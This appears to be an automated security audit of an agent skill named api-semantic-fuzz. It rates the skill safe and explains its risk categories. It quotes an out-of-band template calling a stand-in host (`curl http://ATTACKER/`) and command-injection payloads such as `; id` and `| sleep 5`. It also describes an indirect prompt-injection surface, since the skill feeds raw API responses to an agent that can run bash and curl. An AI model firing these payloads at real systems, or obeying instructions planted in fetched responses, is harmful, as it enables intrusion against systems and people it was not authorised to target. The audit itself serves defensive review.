api-semantic-fuzz
Pass
Audited by Gen Agent Trust Hub on Mar 31, 2026
Risk Level: SAFE
COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides bash scripts that utilize standard system utilities like `curl`, `wc`, and `seq` to automate API discovery tasks. These scripts perform baseline measurement, parameter probing, and automated IDOR validation loops.
- [EXTERNAL_DOWNLOADS]: The skill initiates network communication with external API endpoints to perform semantic analysis and fuzzing operations.
- [DATA_EXFILTRATION]: Performs network operations targeting user-defined URLs. It includes reference templates for out-of-band (OOB) testing, such as `curl http://ATTACKER/`, which is a standard security testing technique used to confirm vulnerabilities on a remote target.
- [REMOTE_CODE_EXECUTION]: Includes a reference catalog of command injection payloads (e.g., `; id`, `| sleep 5`) designed for testing external systems. These strings are documented as fuzzing vectors and are not intended for local execution by the agent.
- [PROMPT_INJECTION]: The skill analyzes responses from external APIs to detect vulnerabilities, which introduces a surface for indirect prompt injection if a malicious target returns adversarial instructions.
  - Ingestion points: Raw HTTP response bodies and headers retrieved via `curl` in `SKILL.md` phases 2 and 3.
  - Boundary markers: None identified; the skill methodology focuses on interpreting raw response data.
  - Capability inventory: Ability to execute shell commands (`bash`) and perform network requests (`curl`).
  - Sanitization: No explicit sanitization or validation of the untrusted API response content is defined.
Audit Metadata